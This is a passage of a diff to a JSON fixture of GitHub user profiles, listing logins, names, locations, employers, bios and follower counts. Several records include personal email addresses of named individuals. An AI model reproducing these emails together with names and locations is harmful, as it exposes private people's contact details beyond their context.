"Alpharetta, GA", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-01-09T03:10:19Z", - "updated_at": "2022-01-26T01:59:08Z", - "node_id": "MDQ6VXNlcjI0OTk4MzQz", + "public_repositories_count": 2, + "created_at": "2013-11-14T14:28:45Z", + "updated_at": "2024-05-21T22:35:10Z", + "node_id": "MDQ6VXNlcjU5Mzk3MzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440228,24 +701127,24 @@ }, { "model": "github.user", - "pk": 3200, + "pk": 8609, "fields": { - "nest_created_at": "2024-09-13T05:04:49.277Z", - "nest_updated_at": "2024-09-13T05:04:49.277Z", - "name": "Boyar Denis", - "login": "BoyarD1", + "nest_created_at": "2024-09-22T10:45:44.924Z", + "nest_updated_at": "2024-09-22T20:30:54.299Z", + "name": "", + "login": "rdwsecuritythemagroep", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/178677662?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/79100525?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-08-17T20:49:47Z", - "updated_at": "2024-08-21T13:03:23Z", - "node_id": "U_kgDOCqZnng", + "public_repositories_count": 0, + "created_at": "2021-02-15T15:38:18Z", + "updated_at": "2024-03-14T09:45:26Z", + "node_id": "MDQ6VXNlcjc5MTAwNTI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440253,49 +701152,49 @@ }, { "model": "github.user", - "pk": 3201, + "pk": 8610, "fields": { - "nest_created_at": "2024-09-13T05:04:59.209Z", - "nest_updated_at": "2024-09-13T05:04:59.209Z", - "name": "", - "login": "vdl1992", + "nest_created_at": "2024-09-22T10:45:45.242Z", + "nest_updated_at": "2024-09-22T20:30:54.621Z", + "name": "Markus Liebelt", + "login": "mliebelt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10447476?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/520039?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-01-08T09:07:09Z", - "updated_at": "2020-07-08T13:23:05Z", - "node_id": "MDQ6VXNlcjEwNDQ3NDc2", - "bio": "", + "following_count": 10, + "followers_count": 33, + "public_gists_count": 8, + "public_repositories_count": 35, + "created_at": "2010-12-12T15:55:16Z", + "updated_at": "2024-09-21T11:23:15Z", + "node_id": "MDQ6VXNlcjUyMDAzOQ==", + "bio": "Old developer, with some experience in Java, Smalltalk, Ruby, Python and lately Javascript and TypeScript.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "mliebelt" } }, { "model": "github.user", - "pk": 3202, + "pk": 8611, "fields": { - "nest_created_at": "2024-09-13T05:05:05.198Z", - "nest_updated_at": "2024-09-13T05:05:06.514Z", - "name": "Arosio Stefano", - "login": "stefano-1973", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46063667?v=4", + "nest_created_at": "2024-09-22T10:45:45.574Z", + "nest_updated_at": "2024-09-22T20:30:54.933Z", + "name": "Niels Lachat", + "login": "Nitwix", + "email": "nielsnfsmw@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24973609?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-12-22T06:31:11Z", - "updated_at": "2024-04-30T07:05:06Z", - "node_id": "MDQ6VXNlcjQ2MDYzNjY3", + "following_count": 6, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2017-01-07T10:26:52Z", + "updated_at": "2024-09-04T11:32:35Z", + "node_id": "MDQ6VXNlcjI0OTczNjA5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440303,24 +701202,24 @@ }, { "model": "github.user", - "pk": 3203, + "pk": 8612, "fields": { - "nest_created_at": "2024-09-13T05:05:19.806Z", - "nest_updated_at": "2024-09-13T16:27:52.429Z", - "name": "", - "login": "andrzejswiatek", + "nest_created_at": "2024-09-22T10:45:46.200Z", + "nest_updated_at": "2024-09-22T20:30:55.587Z", + "name": "ConfusedCrib", + "login": "confusedcrib1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44639433?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/59260717?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-10-31T11:11:29Z", - "updated_at": "2024-09-12T13:44:13Z", - "node_id": "MDQ6VXNlcjQ0NjM5NDMz", + "public_repositories_count": 3, + "created_at": "2019-12-26T16:49:25Z", + "updated_at": "2022-01-07T22:20:30Z", + "node_id": "MDQ6VXNlcjU5MjYwNzE3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440328,49 +701227,49 @@ }, { "model": "github.user", - "pk": 3204, + "pk": 8613, "fields": { - "nest_created_at": "2024-09-13T05:05:20.844Z", - "nest_updated_at": "2024-09-18T00:21:49.515Z", - "name": "Visshal Natarajan - Cloudsine", - "login": "Dr-Lazarus-V2", - "email": "visshal@cloudsine.tech", - "avatar_url": "https://avatars.githubusercontent.com/u/169629015?v=4", + "nest_created_at": "2024-09-22T10:45:55.794Z", + "nest_updated_at": "2024-09-22T20:31:05.638Z", + "name": "Anthony Rhodes", + "login": "fork-while-fork", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/962226?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-05-13T02:27:22Z", - "updated_at": "2024-07-28T22:21:51Z", - "node_id": "U_kgDOChxVVw", - "bio": "Software Engineer @ Cloudsine ", + "followers_count": 45, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2011-08-05T22:54:17Z", + "updated_at": "2024-06-03T13:01:11Z", + "node_id": "MDQ6VXNlcjk2MjIyNg==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3205, + "pk": 8614, "fields": { - "nest_created_at": "2024-09-13T05:06:28.497Z", - "nest_updated_at": "2024-09-13T05:06:28.497Z", - "name": "Phil Skentelbery", - "login": "philskents", + "nest_created_at": "2024-09-22T10:45:56.119Z", + "nest_updated_at": "2024-09-22T20:31:05.947Z", + "name": "Kian Jamali", + "login": "KJ202", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2011227?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19171765?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, - "public_gists_count": 3, - "public_repositories_count": 34, - "created_at": "2012-07-20T10:36:27Z", - "updated_at": "2024-07-03T03:10:58Z", - "node_id": "MDQ6VXNlcjIwMTEyMjc=", + "following_count": 2, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-05-03T15:30:55Z", + "updated_at": "2024-09-13T02:52:35Z", + "node_id": "MDQ6VXNlcjE5MTcxNzY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440378,199 +701277,199 @@ }, { "model": "github.user", - "pk": 3206, + "pk": 8615, "fields": { - "nest_created_at": "2024-09-13T05:07:34.235Z", - "nest_updated_at": "2024-09-14T19:17:22.433Z", + "nest_created_at": "2024-09-22T10:45:56.442Z", + "nest_updated_at": "2024-09-22T20:31:06.291Z", "name": "", - "login": "1muen", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49640488?v=4", + "login": "rbadguy", + "email": "randymarsden17@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26585241?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 3, + "following_count": 0, + "followers_count": 18, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2019-04-15T10:08:06Z", - "updated_at": "2024-09-10T09:58:22Z", - "node_id": "MDQ6VXNlcjQ5NjQwNDg4", + "public_repositories_count": 2, + "created_at": "2017-03-21T23:48:44Z", + "updated_at": "2023-01-08T12:34:07Z", + "node_id": "MDQ6VXNlcjI2NTg1MjQx", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3207, + "pk": 8616, "fields": { - "nest_created_at": "2024-09-13T05:07:44.667Z", - "nest_updated_at": "2024-09-18T19:08:19.506Z", - "name": "Divya", - "login": "007divyachawla", + "nest_created_at": "2024-09-22T10:45:56.763Z", + "nest_updated_at": "2024-09-22T20:31:06.606Z", + "name": "Julio Hawthorne", + "login": "VltraHeaven", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7563150?v=4", - "company": "Tata Consultancy Services Limites", - "location": "Noida", + "avatar_url": "https://avatars.githubusercontent.com/u/45580353?v=4", + "company": "@SUSE @Rancher", + "location": "United States", "collaborators_count": 0, - "following_count": 7, - "followers_count": 6, - "public_gists_count": 2, - "public_repositories_count": 85, - "created_at": "2014-05-12T22:31:50Z", - "updated_at": "2024-09-16T07:33:28Z", - "node_id": "MDQ6VXNlcjc1NjMxNTA=", - "bio": "", + "following_count": 33, + "followers_count": 10, + "public_gists_count": 10, + "public_repositories_count": 71, + "created_at": "2018-12-04T01:28:32Z", + "updated_at": "2024-09-12T20:59:54Z", + "node_id": "MDQ6VXNlcjQ1NTgwMzUz", + "bio": "Rancher Support Enginer @rancherlabs ", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3208, + "pk": 8617, "fields": { - "nest_created_at": "2024-09-13T05:08:40.159Z", - "nest_updated_at": "2024-09-13T05:08:40.159Z", - "name": "Laurent Michenaud", - "login": "Michenux", - "email": "lmichenaud@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/650789?v=4", - "company": "Twiddle Technologies", - "location": "Nantes", + "nest_created_at": "2024-09-22T10:45:57.117Z", + "nest_updated_at": "2024-09-22T20:31:06.944Z", + "name": "M. Ángel Jimeno", + "login": "jimen0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6826244?v=4", + "company": "", + "location": "Spain", "collaborators_count": 0, - "following_count": 3, - "followers_count": 24, - "public_gists_count": 1, - "public_repositories_count": 9, - "created_at": "2011-03-04T11:11:00Z", - "updated_at": "2023-05-16T15:32:51Z", - "node_id": "MDQ6VXNlcjY1MDc4OQ==", - "bio": "", + "following_count": 10, + "followers_count": 174, + "public_gists_count": 4, + "public_repositories_count": 17, + "created_at": "2014-03-01T18:03:05Z", + "updated_at": "2024-06-15T09:42:59Z", + "node_id": "MDQ6VXNlcjY4MjYyNDQ=", + "bio": "Web Applications Security enthusiast. Doing product security and bug bounty programs management. Gopher.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "migueljimeno96" } }, { "model": "github.user", - "pk": 3209, + "pk": 8618, "fields": { - "nest_created_at": "2024-09-13T05:08:40.827Z", - "nest_updated_at": "2024-09-13T05:08:40.827Z", - "name": "Artur Ferfecki", - "login": "theartusz", + "nest_created_at": "2024-09-22T10:45:57.437Z", + "nest_updated_at": "2024-09-22T20:31:07.261Z", + "name": "Simon B.", + "login": "sesam", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40075318?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8921?v=4", "company": "", - "location": "Bergen", + "location": "LJ", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2018-06-08T22:08:11Z", - "updated_at": "2024-06-11T10:44:35Z", - "node_id": "MDQ6VXNlcjQwMDc1MzE4", - "bio": "", + "following_count": 25, + "followers_count": 69, + "public_gists_count": 8, + "public_repositories_count": 136, + "created_at": "2008-04-30T09:56:20Z", + "updated_at": "2024-09-21T11:51:20Z", + "node_id": "MDQ6VXNlcjg5MjE=", + "bio": "Avid programmer. Everything has structure.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3210, + "pk": 8619, "fields": { - "nest_created_at": "2024-09-13T05:08:43.214Z", - "nest_updated_at": "2024-09-13T05:08:43.214Z", - "name": "", - "login": "davidr-bgp", + "nest_created_at": "2024-09-22T10:45:57.797Z", + "nest_updated_at": "2024-09-22T20:31:07.575Z", + "name": "Shane Witbeck", + "login": "thesurlydev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/175223953?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30923?v=4", "company": "", - "location": "", + "location": "PNW", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-07-10T13:21:38Z", - "updated_at": "2024-07-10T13:21:53Z", - "node_id": "U_kgDOCnG0kQ", + "following_count": 418, + "followers_count": 96, + "public_gists_count": 153, + "public_repositories_count": 70, + "created_at": "2008-10-24T23:42:50Z", + "updated_at": "2024-08-29T20:19:20Z", + "node_id": "MDQ6VXNlcjMwOTIz", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "thesurlydev" } }, { "model": "github.user", - "pk": 3211, + "pk": 8620, "fields": { - "nest_created_at": "2024-09-13T05:08:45.938Z", - "nest_updated_at": "2024-09-13T05:08:45.938Z", - "name": "", - "login": "savdbroek", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/115026177?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:45:58.114Z", + "nest_updated_at": "2024-09-22T20:31:07.890Z", + "name": "Emanuel Duss", + "login": "emanuelduss", + "email": "me@emanuelduss.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/438188?v=4", + "company": "@CompassSecurity", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2022-10-04T15:39:16Z", - "updated_at": "2024-07-26T10:42:52Z", - "node_id": "U_kgDOBtspAQ", + "following_count": 58, + "followers_count": 116, + "public_gists_count": 12, + "public_repositories_count": 49, + "created_at": "2010-10-13T16:09:31Z", + "updated_at": "2024-09-13T08:49:56Z", + "node_id": "MDQ6VXNlcjQzODE4OA==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "emanuelduss" } }, { "model": "github.user", - "pk": 3212, + "pk": 8621, "fields": { - "nest_created_at": "2024-09-13T05:08:48.641Z", - "nest_updated_at": "2024-09-13T05:08:48.641Z", - "name": "Marius", - "login": "rhizoet", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/58997736?v=4", - "company": "@23technologies ", - "location": "World", + "nest_created_at": "2024-09-22T10:45:58.425Z", + "nest_updated_at": "2024-09-22T20:31:08.210Z", + "name": "Lars Lehtonen", + "login": "alrs", + "email": "lars.lehtonen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/28523?v=4", + "company": "", + "location": "Los Angeles, California", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2019-12-17T22:57:58Z", - "updated_at": "2024-07-31T06:48:19Z", - "node_id": "MDQ6VXNlcjU4OTk3NzM2", - "bio": "Senior DevOps Engineer", - "is_hireable": false, + "following_count": 41, + "followers_count": 136, + "public_gists_count": 8, + "public_repositories_count": 283, + "created_at": "2008-10-11T13:31:00Z", + "updated_at": "2024-05-17T16:52:25Z", + "node_id": "MDQ6VXNlcjI4NTIz", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3213, + "pk": 8622, "fields": { - "nest_created_at": "2024-09-13T05:09:17.490Z", - "nest_updated_at": "2024-09-18T19:08:03.316Z", - "name": "Christos Leventis", - "login": "Sovenique", + "nest_created_at": "2024-09-22T10:45:58.744Z", + "nest_updated_at": "2024-09-22T20:32:05.092Z", + "name": "Adem Rosic", + "login": "The-Inceptions", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83651108?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/83852285?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 9, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2021-05-04T13:06:36Z", - "updated_at": "2023-11-11T17:46:32Z", - "node_id": "MDQ6VXNlcjgzNjUxMTA4", + "public_repositories_count": 4, + "created_at": "2021-05-08T03:19:35Z", + "updated_at": "2024-08-20T19:08:06Z", + "node_id": "MDQ6VXNlcjgzODUyMjg1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440578,149 +701477,174 @@ }, { "model": "github.user", - "pk": 3214, + "pk": 8623, "fields": { - "nest_created_at": "2024-09-13T05:12:40.140Z", - "nest_updated_at": "2024-09-13T05:12:40.140Z", - "name": "Philipp", - "login": "phzs", + "nest_created_at": "2024-09-22T10:45:59.384Z", + "nest_updated_at": "2024-09-22T20:31:09.160Z", + "name": "Siddharth Balyan", + "login": "alt-glitch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11651131?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/52913345?v=4", "company": "", - "location": "", + "location": "In front of a terminal", "collaborators_count": 0, - "following_count": 7, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-03-25T16:32:45Z", - "updated_at": "2024-08-28T15:29:24Z", - "node_id": "MDQ6VXNlcjExNjUxMTMx", - "bio": "", + "following_count": 59, + "followers_count": 54, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2019-07-15T09:05:58Z", + "updated_at": "2024-09-15T12:44:15Z", + "node_id": "MDQ6VXNlcjUyOTEzMzQ1", + "bio": "i like to build things.\r\nsometimes they break.\r\nother times they break other things.", "is_hireable": false, + "twitter_username": "sidbing" + } +}, +{ + "model": "github.user", + "pk": 8624, + "fields": { + "nest_created_at": "2024-09-22T10:45:59.696Z", + "nest_updated_at": "2024-09-22T20:31:09.502Z", + "name": "FORCHA PEARL", + "login": "Forchapeatl", + "email": "forchapearl1@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24577149?v=4", + "company": "Publiclab", + "location": "Cameroon", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 24, + "public_gists_count": 16, + "public_repositories_count": 87, + "created_at": "2016-12-14T23:13:07Z", + "updated_at": "2024-09-08T23:30:48Z", + "node_id": "MDQ6VXNlcjI0NTc3MTQ5", + "bio": "Software Engineer. Ready to learn , improve and criticize.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3215, + "pk": 8625, "fields": { - "nest_created_at": "2024-09-13T05:12:43.150Z", - "nest_updated_at": "2024-09-13T05:12:43.150Z", - "name": "DvR", - "login": "Anuubis", + "nest_created_at": "2024-09-22T10:46:00.329Z", + "nest_updated_at": "2024-09-22T20:31:10.169Z", + "name": "Ayush Singh", + "login": "g147", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3081217?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26509147?v=4", + "company": "@ARPSyndicate", + "location": "India", "collaborators_count": 0, - "following_count": 14, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2012-12-19T13:45:53Z", - "updated_at": "2024-08-15T11:15:11Z", - "node_id": "MDQ6VXNlcjMwODEyMTc=", - "bio": "", - "is_hireable": false, + "following_count": 287, + "followers_count": 149, + "public_gists_count": 1, + "public_repositories_count": 44, + "created_at": "2017-03-18T18:05:51Z", + "updated_at": "2024-07-16T11:44:00Z", + "node_id": "MDQ6VXNlcjI2NTA5MTQ3", + "bio": "Building @ARPSyndicate\r\n - Global Cybersecurity Intelligence & Research Company", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3216, + "pk": 8626, "fields": { - "nest_created_at": "2024-09-13T05:13:04.967Z", - "nest_updated_at": "2024-09-18T19:03:01.532Z", - "name": "Timothy", - "login": "HilthonTT", + "nest_created_at": "2024-09-22T10:46:00.645Z", + "nest_updated_at": "2024-09-22T20:31:10.520Z", + "name": "Raphael", + "login": "rek7", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/118371200?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25335191?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2022-11-16T14:45:01Z", - "updated_at": "2024-09-01T17:28:16Z", - "node_id": "U_kgDOBw4zgA", - "bio": "Wir müssen wissen, wir werden wissen.", - "is_hireable": false, - "twitter_username": "" + "following_count": 41, + "followers_count": 262, + "public_gists_count": 4, + "public_repositories_count": 29, + "created_at": "2017-01-25T00:28:38Z", + "updated_at": "2024-08-16T20:41:16Z", + "node_id": "MDQ6VXNlcjI1MzM1MTkx", + "bio": "Bash, C, C++, Golang, PHP, and Python.", + "is_hireable": true, + "twitter_username": "pwnSzn" } }, { "model": "github.user", - "pk": 3217, + "pk": 8627, "fields": { - "nest_created_at": "2024-09-13T05:13:34.792Z", - "nest_updated_at": "2024-09-18T19:02:35.969Z", - "name": "CQ", - "login": "cq674350529", - "email": "cq674350529@163.com", - "avatar_url": "https://avatars.githubusercontent.com/u/13868458?v=4", - "company": "", - "location": "China", + "nest_created_at": "2024-09-22T10:46:01.308Z", + "nest_updated_at": "2024-09-22T20:31:11.152Z", + "name": "Wael Nasreddine", + "login": "kalbasit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87115?v=4", + "company": "@canary-technologies-corp ", + "location": "San Francisco Bay Area", "collaborators_count": 0, - "following_count": 78, - "followers_count": 182, - "public_gists_count": 1, - "public_repositories_count": 29, - "created_at": "2015-08-19T11:17:33Z", - "updated_at": "2024-09-18T01:29:18Z", - "node_id": "MDQ6VXNlcjEzODY4NDU4", + "following_count": 142, + "followers_count": 180, + "public_gists_count": 91, + "public_repositories_count": 237, + "created_at": "2009-05-21T11:11:29Z", + "updated_at": "2024-05-07T17:34:01Z", + "node_id": "MDQ6VXNlcjg3MTE1", "bio": "", - "is_hireable": false, - "twitter_username": "cq674350529" + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3218, + "pk": 8628, "fields": { - "nest_created_at": "2024-09-13T05:14:00.980Z", - "nest_updated_at": "2024-09-18T19:02:02.665Z", - "name": "Fabian", - "login": "fabgilson", + "nest_created_at": "2024-09-22T10:46:01.957Z", + "nest_updated_at": "2024-09-22T20:31:11.780Z", + "name": "Mikail Tunç ", + "login": "emtunc", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1422587?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6348359?v=4", "company": "", - "location": "", + "location": "London", "collaborators_count": 0, "following_count": 1, - "followers_count": 1, + "followers_count": 92, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2012-02-09T10:26:07Z", - "updated_at": "2024-08-23T03:25:03Z", - "node_id": "MDQ6VXNlcjE0MjI1ODc=", + "public_repositories_count": 23, + "created_at": "2014-01-08T10:49:29Z", + "updated_at": "2024-09-11T12:02:26Z", + "node_id": "MDQ6VXNlcjYzNDgzNTk=", "bio": "", - "is_hireable": false, - "twitter_username": "FabGilson" + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3219, + "pk": 8629, "fields": { - "nest_created_at": "2024-09-13T05:14:38.967Z", - "nest_updated_at": "2024-09-13T05:14:38.967Z", + "nest_created_at": "2024-09-22T10:46:02.274Z", + "nest_updated_at": "2024-09-22T20:31:12.107Z", "name": "", - "login": "SecLoop", + "login": "CowlingBanana", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15940596?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/51919963?v=4", "company": "", - "location": "", + "location": "::1", "collaborators_count": 0, - "following_count": 633, - "followers_count": 93, - "public_gists_count": 4, - "public_repositories_count": 196, - "created_at": "2015-11-20T10:06:53Z", - "updated_at": "2023-11-25T06:57:53Z", - "node_id": "MDQ6VXNlcjE1OTQwNTk2", + "following_count": 16, + "followers_count": 11, + "public_gists_count": 9, + "public_repositories_count": 108, + "created_at": "2019-06-17T14:44:57Z", + "updated_at": "2022-10-01T05:14:11Z", + "node_id": "MDQ6VXNlcjUxOTE5OTYz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440728,24 +701652,24 @@ }, { "model": "github.user", - "pk": 3220, + "pk": 8630, "fields": { - "nest_created_at": "2024-09-13T05:15:46.065Z", - "nest_updated_at": "2024-09-18T19:00:07.486Z", + "nest_created_at": "2024-09-22T10:46:03.016Z", + "nest_updated_at": "2024-09-22T20:31:12.759Z", "name": "", - "login": "phmazzoni", + "login": "danmartinj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15751026?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8138592?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-11-09T22:52:16Z", - "updated_at": "2023-08-29T23:32:40Z", - "node_id": "MDQ6VXNlcjE1NzUxMDI2", + "public_repositories_count": 2, + "created_at": "2014-07-11T20:03:35Z", + "updated_at": "2024-08-16T14:45:40Z", + "node_id": "MDQ6VXNlcjgxMzg1OTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440753,99 +701677,99 @@ }, { "model": "github.user", - "pk": 3221, + "pk": 8631, "fields": { - "nest_created_at": "2024-09-13T05:15:48.052Z", - "nest_updated_at": "2024-09-13T05:15:48.052Z", - "name": "", - "login": "tuannonh", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65121914?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:46:03.328Z", + "nest_updated_at": "2024-09-22T20:31:13.073Z", + "name": "Syed Faheel Ahmad", + "login": "faheel", + "email": "faheel@live.in", + "avatar_url": "https://avatars.githubusercontent.com/u/11466676?v=4", + "company": "@Animall-In ", + "location": "Bangalore", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-05-10T14:24:31Z", - "updated_at": "2023-06-13T08:30:51Z", - "node_id": "MDQ6VXNlcjY1MTIxOTE0", - "bio": "", + "following_count": 49, + "followers_count": 136, + "public_gists_count": 5, + "public_repositories_count": 108, + "created_at": "2015-03-13T21:07:07Z", + "updated_at": "2024-08-27T04:39:52Z", + "node_id": "MDQ6VXNlcjExNDY2Njc2", + "bio": "Full-stack web developer. Rookie software architect. FOSS enthusiast.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3222, + "pk": 8632, "fields": { - "nest_created_at": "2024-09-13T05:16:49.200Z", - "nest_updated_at": "2024-09-18T18:56:10.794Z", - "name": "Trace Meyers", - "login": "k17trmeye", + "nest_created_at": "2024-09-22T10:46:03.639Z", + "nest_updated_at": "2024-09-22T20:31:13.402Z", + "name": "Jason Haddix", + "login": "jhaddix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92347115?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3488554?v=4", "company": "", - "location": "", + "location": "United States", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-10-12T02:01:55Z", - "updated_at": "2024-05-02T16:11:28Z", - "node_id": "U_kgDOBYEa6w", - "bio": "", - "is_hireable": false, + "following_count": 2, + "followers_count": 10127, + "public_gists_count": 15, + "public_repositories_count": 64, + "created_at": "2013-02-06T05:05:12Z", + "updated_at": "2024-09-14T19:52:43Z", + "node_id": "MDQ6VXNlcjM0ODg1NTQ=", + "bio": "Father, hacker, blogger, gamer, & nerd. Bounty Hunter. ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3223, + "pk": 8633, "fields": { - "nest_created_at": "2024-09-13T05:17:10.871Z", - "nest_updated_at": "2024-09-13T05:17:10.871Z", - "name": "Hugh Greene", - "login": "HughG", - "email": "githugh@tameter.org", - "avatar_url": "https://avatars.githubusercontent.com/u/1408302?v=4", - "company": "", - "location": "UK", + "nest_created_at": "2024-09-22T10:46:04.261Z", + "nest_updated_at": "2024-09-22T20:31:14.052Z", + "name": "AG", + "login": "mzpqnxow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8016228?v=4", + "company": "MZPQNXOW, LLC", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2012-02-04T16:29:19Z", - "updated_at": "2024-08-28T10:20:07Z", - "node_id": "MDQ6VXNlcjE0MDgzMDI=", - "bio": "Senior software developer with interests in many things, including software and documentation tools.", + "following_count": 56, + "followers_count": 115, + "public_gists_count": 145, + "public_repositories_count": 402, + "created_at": "2014-06-29T02:37:35Z", + "updated_at": "2024-08-27T21:20:38Z", + "node_id": "MDQ6VXNlcjgwMTYyMjg=", + "bio": "Some Python, ARM/MIPS(EL) assembly, embedded system tools, forks/fixes, research, etc. I like to tinker with broken electronics, and break working electronics", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3224, + "pk": 8634, "fields": { - "nest_created_at": "2024-09-13T05:17:12.980Z", - "nest_updated_at": "2024-09-13T05:17:12.980Z", - "name": "Wesley Hartford", - "login": "wfhartford", + "nest_created_at": "2024-09-22T10:46:04.579Z", + "nest_updated_at": "2024-09-22T20:31:14.397Z", + "name": "Seqrity", + "login": "seqrity", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/717585?v=4", + "avatar_url": 